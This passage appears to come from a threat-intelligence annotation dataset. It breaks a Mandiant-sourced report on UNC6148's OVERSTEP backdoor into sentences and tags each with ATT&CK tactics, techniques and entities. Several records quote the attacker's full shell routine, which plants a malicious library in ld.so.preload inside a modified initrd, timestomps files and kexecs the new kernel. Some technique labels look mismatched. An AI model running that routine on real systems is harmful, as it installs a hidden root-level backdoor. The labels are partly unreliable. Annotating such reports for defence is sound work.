"[REDACTED] >>xxx.elf;\nchmod 777 /usr/lib/libsamba-errors.so.6;\ntouch -c /usr/lib/libsamba-errors.so.6 -r echo /usr/lib/libsamba-errors.so.6 > /etc/ld.so.preload;\nchown root:root /usr/lib/libsamba-errors.so.6;\nchmod 777 /usr/lib/libsamba-errors.so.6;\ntouch -c /usr/lib/libsamba-errors.so.6 -r echo /usr/lib/libsamba-errors.so.6 > /etc/ld.so.preload;\narp", "sentence_text": "Next, UNC6148 modified the legitimate RC file /etc/rc.d/rc.fwboot to achieve persistence for OVERSTEP.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1543.002", "name": "Systemd Service" } ], "procedure": "Modify /etc/rc.d/rc.fwboot for OVERSTEP persistence", "entities": [ { "text": " UNC6148", "start": 5, "end": 13, "label": "ThreatActor" }, { "text": " modified", "start": 13, "end": 22, "label": "Action" }, { "text": "RC file /etc/rc.d/rc.fwboot", "start": 38, "end": 65, "label": "Infrastructure_Indicator" }, { "text": "achieve persistence", "start": 69, "end": 88, "label": "Action" }, { "text": "OVERSTEP", "start": 93, "end": 101, "label": "MalwareTool" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s36-b708be", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 36, "context_before": "Next, UNC6148 modified the legitimate RC file /etc/rc.d/rc.fwboot to achieve persistence for OVERSTEP.", "sentence_text": "The changes meant that whenever the appliance was rebooted, the OVERSTEP binary would be loaded into the running filesystem on the appliance.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1037.004", "name": "Boot or Logon Initialization Scripts: RC Scripts" } ], "procedure": "Load the OVERSTEP binary into the running filesystem whenever the appliance is rebooted.", "entities": [ { "text": "OVERSTEP", "start": 64, "end": 72, "label": "MalwareTool" }, { "text": "loaded into the running filesystem", "start": 89, "end": 123, "label": "Action" }, { "text": "appliance", "start": 131, "end": 140, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s37-b189c9", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 37, "context_before": "The changes meant that whenever the appliance was rebooted, the OVERSTEP binary would be loaded into the running filesystem on the appliance.", "sentence_text": "Specifically, the bootCurrentFirmware function in the rc.fwboot script was modified to include code that performed the following:\nCreated a temporary directory named zzz within the present firmware directory.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1543.001", "name": "Launch Agent" } ], "procedure": "Modify bootCurrentFirmware function to create zzz directory", "entities": [ { "text": " modified", "start": 74, "end": 83, "label": "Action" }, { "text": " bootCurrentFirmware", "start": 17, "end": 37, "label": "Infrastructure_Indicator" }, { "text": " rc.fwboot script", "start": 53, "end": 70, "label": "Infrastructure_Indicator" }, { "text": "temporary directory ", "start": 140, "end": 160, "label": "Infrastructure_Indicator" }, { "text": "zzz", "start": 166, "end": 169, "label": "Infrastructure_Indicator" }, { "text": "include code", "start": 87, "end": 99, "label": "Action" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s38-80a26f", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 38, "context_before": "Specifically, the bootCurrentFirmware function in the rc.fwboot script was modified to include code that performed the following:\nCreated a temporary directory named zzz within the present firmware directory.", "sentence_text": "It was a preparatory step for injecting malicious content without directly overwriting critical system files during runtime.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Prepare to inject malicious content without directly overwriting critical system files during runtime.", "entities": [ { "text": "injecting malicious content", "start": 30, "end": 57, "label": "Action" }, { "text": "overwriting critical system files", "start": 75, "end": 108, "label": "Action" }, { "text": "critical system files", "start": 87, "end": 108, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s39-70f68f", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 39, "context_before": "It was a preparatory step for injecting malicious content without directly overwriting critical system files during runtime.", "sentence_text": "Decompressed the\nINITRD.GZ\nfile, which was the compressed initial RAM disk image.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1543.001", "name": "Launch Agent" } ], "procedure": "Decompress INITRD.GZ file", "entities": [ { "text": "Decompressed ", "start": 0, "end": 13, "label": "Action" }, { "text": " RAM disk", "start": 65, "end": 74, "label": "Infrastructure_Indicator" }, { "text": "INITRD.GZ\nfile", "start": 17, "end": 31, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s40-2d8990", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 40, "context_before": "Decompressed the\nINITRD.GZ\nfile, which was the compressed initial RAM disk image.", "sentence_text": "The decompressed file was named INITRD , which contains the minimal root filesystem that is loaded into memory during the boot process before the actual root filesystem is mounted.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s41-168666", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 41, "context_before": "The decompressed file was named INITRD , which contains the minimal root filesystem that is loaded into memory during the boot process before the actual root filesystem is mounted.", "sentence_text": "Modifying this image allowed the attacker to inject malicious files that will be present and executable early in the boot sequence, making it difficult to detect and remove.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1543.001", "name": "Launch Agent" } ], "procedure": "Modify INITRD image to inject malicious files into boot sequence", "entities": [ { "text": "attacker", "start": 33, "end": 41, "label": "ThreatActor" }, { "text": "inject", "start": 45, "end": 51, "label": "Action" }, { "text": "malicious files", "start": 52, "end": 67, "label": "MalwareTool" }, { "text": " executable ", "start": 92, "end": 104, "label": "Action" }, { "text": " boot sequence", "start": 116, "end": 130, "label": "Infrastructure_Indicator" }, { "text": "Modifying", "start": 0, "end": 9, "label": "Action" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s42-533e34", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 42, "context_before": "Modifying this image allowed the attacker to inject malicious files that will be present and executable early in the boot sequence, making it difficult to detect and remove.", "sentence_text": "Mounted the decompressed INITRD file as a loop device to the newly created $fwLoc/zzz directory.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1543.001", "name": "Launch Agent" } ], "procedure": "Mount INITRD as loop device to $fwLoc/zzz directory", "entities": [ { "text": " decompressed INITRD file", "start": 11, "end": 36, "label": "Infrastructure_Indicator" }, { "text": "Mounted", "start": 0, "end": 7, "label": "Action" }, { "text": "loop device", "start": 42, "end": 53, "label": "Infrastructure_Indicator" }, { "text": "$fwLoc/zzz directory", "start": 75, "end": 95, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s43-aa6326", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 43, "context_before": "Mounted the decompressed INITRD file as a loop device to the newly created $fwLoc/zzz directory.", "sentence_text": "This made the contents of the INITRD file accessible and modifiable as if it were a regular filesystem.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": null, "procedure": "Make the contents of the INITRD file accessible and modifiable as a regular filesystem.", "entities": [ { "text": "made the contents of the INITRD file accessible and modifiable", "start": 5, "end": 67, "label": "Action" }, { "text": "INITRD file", "start": 30, "end": 41, "label": "Infrastructure_Indicator" }, { "text": "regular filesystem", "start": 84, "end": 102, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s44-b2bb46", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 44, "context_before": "This made the contents of the INITRD file accessible and modifiable as if it were a regular filesystem.", "sentence_text": "This was an important step that allowed the script to browse and modify the contents of the initial RAM disk.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1543.001", "name": "Launch Agent" } ], "procedure": "Allow the script to browse and modify the contents of the initial RAM disk.", "entities": [ { "text": "browse and modify the contents of the initial RAM disk", "start": 54, "end": 108, "label": "Action" }, { "text": "script", "start": 44, "end": 50, "label": "MalwareTool" }, { "text": "initial RAM disk", "start": 92, "end": 108, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s45-7794d4", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 45, "context_before": "This was an important step that allowed the script to browse and modify the contents of the initial RAM disk.", "sentence_text": "Copied the file libsamba-errors.so.6 from /cf/ into the mounted INITRD directory /usr/", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1543.001", "name": "Launch Agent" } ], "procedure": "Copy libsamba-errors.so.6 from /cf/ to INITRD /usr/ directory", "entities": [ { "text": "file libsamba-errors.so.6 from /cf/ ", "start": 11, "end": 47, "label": "Infrastructure_Indicator" }, { "text": "Copied", "start": 0, "end": 6, "label": "Action" }, { "text": " INITRD directory /usr/", "start": 63, "end": 86, "label": "Infrastructure_Indicator" }, { "text": "mounted", "start": 56, "end": 63, "label": "Action" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s46-54c754", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 46, "context_before": "Copied the file libsamba-errors.so.6 from /cf/ into the mounted INITRD directory /usr/", "sentence_text": "lib/ Changed the owner and group of the file libsamba-errors.so.6 to root:root .", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1548.001", "name": "Setuid and Setgid" } ], "procedure": "Change owner/group of libsamba-errors.so.6 to root:root", "entities": [ { "text": "libsamba-errors.so.6", "start": 45, "end": 65, "label": "MalwareTool" }, { "text": " root:root", "start": 68, "end": 78, "label": "Infrastructure_Indicator" }, { "text": "Changed", "start": 5, "end": 12, "label": "Action" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s47-a45f8a", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 47, "context_before": "lib/ Changed the owner and group of the file libsamba-errors.so.6 to root:root .", "sentence_text": "Employed a timestomping technique, attempting to copy the modification timestamp from the legitimate file libsamba-errors.so to the malicious file libsamba-errors.so.6 .", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.006", "name": "Timestomp" } ], "procedure": "Employ timestomping to copy timestamps from libsamba-errors.so to libsamba-errors.so.6", "entities": [ { "text": " malicious file libsamba-errors.so.6", "start": 131, "end": 167, "label": "MalwareTool" }, { "text": "legitimate file libsamba-errors.so", "start": 90, "end": 124, "label": "Infrastructure_Indicator" }, { "text": "Employed a timestomping technique", "start": 0, "end": 33, "label": "Action" }, { "text": "attempting to copy the modification timestamp", "start": 35, "end": 80, "label": "Action" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s48-17c1ef", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 48, "context_before": "Employed a timestomping technique, attempting to copy the modification timestamp from the legitimate file libsamba-errors.so to the malicious file libsamba-errors.so.6 .", "sentence_text": "The goal was to make the malicious file appear as if it were part of the original system installation, thereby hindering detection and investigation.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.006", "name": "Indicator Removal: Timestomp" } ], "procedure": "Copy the modification timestamp from a legitimate file to a malicious file so the malicious file appears to be part of the original system installation.", "entities": [ { "text": "make the malicious file appear as if it were part of the original system installation", "start": 16, "end": 101, "label": "Action" }, { "text": "malicious file", "start": 25, "end": 39, "label": "Infrastructure_Indicator" }, { "text": "hindering detection and investigation", "start": 111, "end": 148, "label": "Action" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s49-70526e", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 49, "context_before": "The goal was to make the malicious file appear as if it were part of the original system installation, thereby hindering detection and investigation.", "sentence_text": "Wrote the path to the malicious file /usr/lib/libsamba-errors.so.6 into the ld.so.preload file located within the INITRD directory /etc/ .", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1543.001", "name": "Launch Agent" } ], "procedure": "Write /usr/lib/libsamba-errors.so.6 to INITRD /etc/ld.so.preload", "entities": [ { "text": " malicious file /usr/lib/libsamba-errors.so.6", "start": 21, "end": 66, "label": "MalwareTool" }, { "text": " ld.so.preload file", "start": 75, "end": 94, "label": "Infrastructure_Indicator" }, { "text": " INITRD directory /etc/", "start": 113, "end": 136, "label": "Infrastructure_Indicator" }, { "text": "Wrote the path", "start": 0, "end": 14, "label": "Action" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s50-da7f60", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 50, "context_before": "Wrote the path to the malicious file /usr/lib/libsamba-errors.so.6 into the ld.so.preload file located within the INITRD directory /etc/ .", "sentence_text": "This causes dynamic executables to load the OVERSTEP shared object file, providing persistence and privileged execution in system processes.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1574.006", "name": "Hijack Execution Flow: Dynamic Linker Hijacking" } ], "procedure": "Write the malicious shared object path into ld.so.preload so dynamic executables load OVERSTEP, enabling persistence and privileged execution in system processes.", "entities": [ { "text": "load the OVERSTEP shared object file", "start": 35, "end": 71, "label": "Action" }, { "text": "OVERSTEP shared object file", "start": 44, "end": 71, "label": "MalwareTool" }, { "text": "providing persistence", "start": 73, "end": 94, "label": "Action" }, { "text": "privileged execution in system processes", "start": 99, "end": 139, "label": "Action" }, { "text": "system processes", "start": 123, "end": 139, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s51-5b00a2", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 51, "context_before": "This causes dynamic executables to load the OVERSTEP shared object file, providing persistence and privileged execution in system processes.", "sentence_text": "Cleaned up temporary modifications, including:\nFlushing pending disk writes to ensure all changes to the INITRD file were saved Unmounting the INITRD file from the temporary directory Recompressing the modified INITRD file Removing the temporary directory Renamed the newly compressed INITRD to INITRD.GZ , matching the expected filename.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.004", "name": "File Deletion" } ], "procedure": "Flush disk writes, unmount INITRD, recompress, remove temp directory, and rename to INITRD.GZ", "entities": [ { "text": "Cleaned up temporary modifications", "start": 0, "end": 34, "label": "Action" }, { "text": " INITRD file", "start": 142, "end": 154, "label": "Infrastructure_Indicator" }, { "text": "INITRD file ", "start": 211, "end": 223, "label": "Infrastructure_Indicator" }, { "text": "INITRD.GZ", "start": 295, "end": 304, "label": "Infrastructure_Indicator" }, { "text": "INITRD", "start": 285, "end": 291, "label": "Infrastructure_Indicator" }, { "text": "INITRD file ", "start": 105, "end": 117, "label": "Infrastructure_Indicator" }, { "text": "Flushing pending disk", "start": 47, "end": 68, "label": "Action" }, { "text": "ensure", "start": 79, "end": 85, "label": "Action" }, { "text": "Unmounting", "start": 128, "end": 138, "label": "Action" }, { "text": "Removing", "start": 223, "end": 231, "label": "Action" }, { "text": "compressed", "start": 274, "end": 284, "label": "Action" }, { "text": "Renamed", "start": 256, "end": 263, "label": "Action" }, { "text": "Recompressing", "start": 184, "end": 197, "label": "Action" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s52-0a3255", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 52, "context_before": "Cleaned up temporary modifications, including:\nFlushing pending disk writes to ensure all changes to the INITRD file were saved Unmounting the INITRD file from the temporary directory Recompressing the modified INITRD file Removing the temporary directory Renamed the newly compressed INITRD to INITRD.GZ , matching the expected filename.", "sentence_text": "Changed the timestamps of the modified INITRD.GZ file to match those of the kernel image file, BZIMAGE .", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.006", "name": "Timestomp" } ], "procedure": "Changed the timestamps of the modified INITRD.GZ file to match the BZIMAGE kernel image file.", "entities": [ { "text": "Changed the timestamps of the modified INITRD.GZ file to match those of the kernel image file, BZIMAGE", "start": 0, "end": 102, "label": "Action" }, { "text": "INITRD.GZ", "start": 39, "end": 48, "label": "Infrastructure_Indicator" }, { "text": "BZIMAGE", "start": 95, "end": 102, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s53-b141e9", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 53, "context_before": "Changed the timestamps of the modified INITRD.GZ file to match those of the kernel image file, BZIMAGE .", "sentence_text": "This was another timestomping operation to hinder detection and investigation.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.006", "name": "Timestomp" } ], "procedure": "Modify file timestamps to evade detection and hinder investigation.", "entities": [ { "text": "timestomping operation to hinder detection and investigation", "start": 17, "end": 77, "label": "Action" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s54-2e06ee", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 54, "context_before": "This was another timestomping operation to hinder detection and investigation.", "sentence_text": "Loaded the kernel image BZIMAGE and the modified initial RAM disk, INITRD.GZ , into memory for a new kernel execution.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1543.001", "name": "Launch Agent" } ], "procedure": "Load modified BZIMAGE and INITRD.GZ for kernel execution", "entities": [ { "text": "modified initial RAM disk, INITRD.GZ ", "start": 40, "end": 77, "label": "Infrastructure_Indicator" }, { "text": " kernel image BZIMAGE", "start": 10, "end": 31, "label": "Infrastructure_Indicator" }, { "text": "Loaded ", "start": 0, "end": 7, "label": "Action" }, { "text": " new kernel execution", "start": 96, "end": 117, "label": "Action" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s55-99a190", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 55, "context_before": "Loaded the kernel image BZIMAGE and the modified initial RAM disk, INITRD.GZ , into memory for a new kernel execution.", "sentence_text": "It also appended kernel boot options from LINUX.OPT .", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1543.001", "name": "Launch Agent" } ], "procedure": "Append kernel boot options from LINUX.OPT", "entities": [ { "text": "appended", "start": 8, "end": 16, "label": "Action" }, { "text": " LINUX.OPT", "start": 41, "end": 51, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s56-897410", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 56, "context_before": "It also appended kernel boot options from LINUX.OPT .", "sentence_text": "This prepared the system to boot into the modified firmware.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": null, "procedure": "Prepare the system to boot into the modified firmware by appending kernel boot options.", "entities": [ { "text": "prepared the system to boot into the modified firmware", "start": 5, "end": 59, "label": "Action" }, { "text": "modified firmware", "start": 42, "end": 59, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s57-45de42", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 57, "context_before": "This prepared the system to boot into the modified firmware.", "sentence_text": "The use of kexec allowed the running Linux kernel to boot another Linux kernel without a full hardware reboot.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.004", "name": "Unix Shell" } ], "procedure": "Use kexec to boot modified kernel without hardware reboot", "entities": [ { "text": " boot ", "start": 52, "end": 58, "label": "Action" }, { "text": "kexec ", "start": 11, "end": 17, "label": "Infrastructure_Indicator" }, { "text": " Linux kernel", "start": 65, "end": 78, "label": "Infrastructure_Indicator" }, { "text": "Linux kernel", "start": 37, "end": 49, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s58-637155", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 58, "context_before": "The use of kexec allowed the running Linux kernel to boot another Linux kernel without a full hardware reboot.", "sentence_text": "Executed the newly loaded kernel by initiating a soft reboot.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.004", "name": "Unix Shell" } ], "procedure": "Execute newly loaded kernel via soft reboot", "entities": [ { "text": "newly loaded kernel", "start": 13, "end": 32, "label": "Infrastructure_Indicator" }, { "text": "Executed", "start": 0, "end": 8, "label": "Action" }, { "text": "initiating a soft reboot", "start": 36, "end": 60, "label": "Action" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s59-b8d2d3", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 59, "context_before": "Executed the newly loaded kernel by initiating a soft reboot.", "sentence_text": "In summary, the code took advantage of the system's boot process to inject a persistent rootkit.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1543.001", "name": "Launch Agent" } ], "procedure": "Inject persistent rootkit via system boot process", "entities": [ { "text": "code", "start": 16, "end": 20, "label": "MalwareTool" }, { "text": "took advantage", "start": 21, "end": 35, "label": "Action" }, { "text": " inject", "start": 67, "end": 74, "label": "Action" }, { "text": "persistent rootkit", "start": 77, "end": 95, "label": "MalwareTool" }, { "text": "system's boot process", "start": 43, "end": 64, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s60-5c6440", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 60, "context_before": "In summary, the code took advantage of the system's boot process to inject a persistent rootkit.", "sentence_text": "By modifying the INITRD file and leveraging ld.so.preload , the attacker ensured their malicious code would be loaded and executed every time any dynamic executable starts, providing them with privileged and persistence control of the appliance.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1574.006", "name": "Dynamic Linker Hijacking" } ], "procedure": "Modify INITRD and leverage ld.so.preload for persistent privileged execution", "entities": [ { "text": "modifying", "start": 3, "end": 12, "label": "Action" }, { "text": " leveraging", "start": 32, "end": 43, "label": "Action" }, { "text": " attacker", "start": 63, "end": 72, "label": "ThreatActor" }, { "text": "ensured", "start": 73, "end": 80, "label": "Action" }, { "text": "malicious code ", "start": 87, "end": 102, "label": "MalwareTool" }, { "text": " loaded", "start": 110, "end": 117, "label": "Action" }, { "text": "executed ", "start": 122, "end": 131, "label": "Action" }, { "text": "privileged and persistence control", "start": 193, "end": 227, "label": "Action" }, { "text": " INITRD file", "start": 16, "end": 28, "label": "Infrastructure_Indicator" }, { "text": " ld.so.preload", "start": 43, "end": 57, "label": "Infrastructure_Indicator" }, { "text": "dynamic executable", "start": 146, "end": 164, "label": "Infrastructure_Indicator" }, { "text": "appliance", "start": 235, "end": 244, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s61-cbb9f0", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 61, "context_before": "By modifying the INITRD file and leveraging ld.so.preload , the attacker ensured their malicious code would be loaded and executed every time any dynamic executable starts, providing them with privileged and persistence control of the appliance.", "sentence_text": "function bootCurrentFirmware()\n{\necho \"$FUNCNAME: begin\" >> $LOGFILE fwLoc=/cf/firmware/current if [ !", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s62-5e38fa", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 62, "context_before": "function bootCurrentFirmware()\n{\necho \"$FUNCNAME: begin\" >> $LOGFILE fwLoc=/cf/firmware/current if [ !", "sentence_text": "-f $fwLoc/BZIMAGE ]; then echo \"Can't locate the kernel image\" >> $LOGFILE;", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s63-943819", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 63, "context_before": "-f $fwLoc/BZIMAGE ]; then echo \"Can't locate the kernel image\" >> $LOGFILE;", "sentence_text": "elif [ -f $fwLoc/INITRD ]; then echo \"Can't locate the filesystem image\" >> $LOGFILE;\nelse\nmkdir $fwLoc/zzz\ngzip -d $fwLoc/INITRD.GZ mount -o loop $fwLoc/INITRD $fwLoc/zzz cp /cf/libsamba-errors.so.6 $fwLoc/zzz/usr/lib/libsamba-errors.so.6 chown root:root $fwLoc/zzz/usr/lib/libsamba-errors.so.6 chmod 777 $fwLoc/zzz/usr/lib/libsamba-errors.so.6 touch -c $fwLoc/zzz/usr/lib/libsamba-errors.so.6 -r $fwLoc/zzz/usr/lib/libsamba-errors.so echo /usr/lib/libsamba-errors.so.6 > $fwLoc/zzz/etc/ld.so.preload sync; umount $fwLoc/zzz; sync; gzip $fwLoc/INITRD; rm -rf $fwLoc/zzz mv $fwLoc/INITRD.gz $fwLoc/INITRD.GZ; touch -c $fwLoc/INITRD.GZ -r $fwLoc/BZIMAGE /usr/local/sbin/kexec -l $fwLoc/BZIMAGE --initrd=$fwLoc/INITRD.GZ --append=\"`cat $fwLoc/LINUX.OPT`\" /usr/local/sbin/kexec -e;\nfi\necho \"$FUNCNAME: end\" >> $LOGFILE }", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s64-50d2a5", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 64, "context_before": "elif [ -f $fwLoc/INITRD ]; then echo \"Can't locate the filesystem image\" >> $LOGFILE;\nelse\nmkdir $fwLoc/zzz\ngzip -d $fwLoc/INITRD.GZ mount -o loop $fwLoc/INITRD $fwLoc/zzz cp /cf/libsamba-errors.so.6 $fwLoc/zzz/usr/lib/libsamba-errors.so.6 chown root:root $fwLoc/zzz/usr/lib/libsamba-errors.so.6 chmod 777 $fwLoc/zzz/usr/lib/libsamba-errors.so.6 touch -c $fwLoc/zzz/usr/lib/libsamba-errors.so.6 -r $fwLoc/zzz/usr/lib/libsamba-errors.so echo /usr/lib/libsamba-errors.so.6 > $fwLoc/zzz/etc/ld.so.preload sync; umount $fwLoc/zzz; sync; gzip $fwLoc/INITRD; rm -rf $fwLoc/zzz mv $fwLoc/INITRD.gz $fwLoc/INITRD.GZ; touch -c $fwLoc/INITRD.GZ -r $fwLoc/BZIMAGE /usr/local/sbin/kexec -l $fwLoc/BZIMAGE --initrd=$fwLoc/INITRD.GZ --append=\"`cat $fwLoc/LINUX.OPT`\" /usr/local/sbin/kexec -e;\nfi\necho \"$FUNCNAME: end\" >> $LOGFILE }", "sentence_text": "Once the deployment of OVERSTEP was complete, the threat actor cleared the system logs and rebooted the appliance to trigger the execution of OVERSTEP.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.001", "name": "Clear Windows Event Logs" } ], "procedure": "Clear system logs and reboot appliance to trigger OVERSTEP execution", "entities": [ { "text": "system logs", "start": 75, "end": 86, "label": "Infrastructure_Indicator" }, { "text": "appliance", "start": 104, "end": 113, "label": "Infrastructure_Indicator" }, { "text": "OVERSTE", "start": 23, "end": 30, "label": "MalwareTool" }, { "text": " OVERSTEP", "start": 141, "end": 150, "label": "MalwareTool" }, { "text": "threat actor", "start": 50, "end": 62, "label": "ThreatActor" }, { "text": " deployment", "start": 8, "end": 19, "label": "Action" }, { "text": "cleared ", "start": 63, "end": 71, "label": "Action" }, { "text": "rebooted", "start": 91, "end": 99, "label": "Action" }, { "text": " trigger", "start": 116, "end": 124, "label": "Action" }, { "text": " execution", "start": 128, "end": 138, "label": "Action" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s65-dac399", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 65, "context_before": "Once the deployment of OVERSTEP was complete, the threat actor cleared the system logs and rebooted the appliance to trigger the execution of OVERSTEP.", "sentence_text": "Analysis of OVERSTEP OVERSTEP is a backdoor written in C, designed for SonicWall SMA 100 series appliances; observed samples have been compiled as a 32-bit ELF shared object for the Intel x86 architecture.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s66-da27c1", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 66, "context_before": "Analysis of OVERSTEP OVERSTEP is a backdoor written in C, designed for SonicWall SMA 100 series appliances; observed samples have been compiled as a 32-bit ELF shared object for the Intel x86 architecture.", "sentence_text": "This shared object is designed to be loaded into processes via the /etc/ld.so.preload file.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1574.006", "name": "Hijack Execution Flow: Dynamic Linker Hijacking" } ], "procedure": "Load the OVERSTEP shared object into processes via the /etc/ld.so.preload file.", "entities": [ { "text": "loaded into processes", "start": 37, "end": 58, "label": "Action" }, { "text": "/etc/ld.so.preload", "start": 67, "end": 85, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s67-dd4878", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 67, "context_before": "This shared object is designed to be loaded into processes via the /etc/ld.so.preload file.", "sentence_text": "When preloaded in this manner, the malicious library is mapped into the address space of subsequently launched processes.", "relevant": "yes", "tactic": [ { 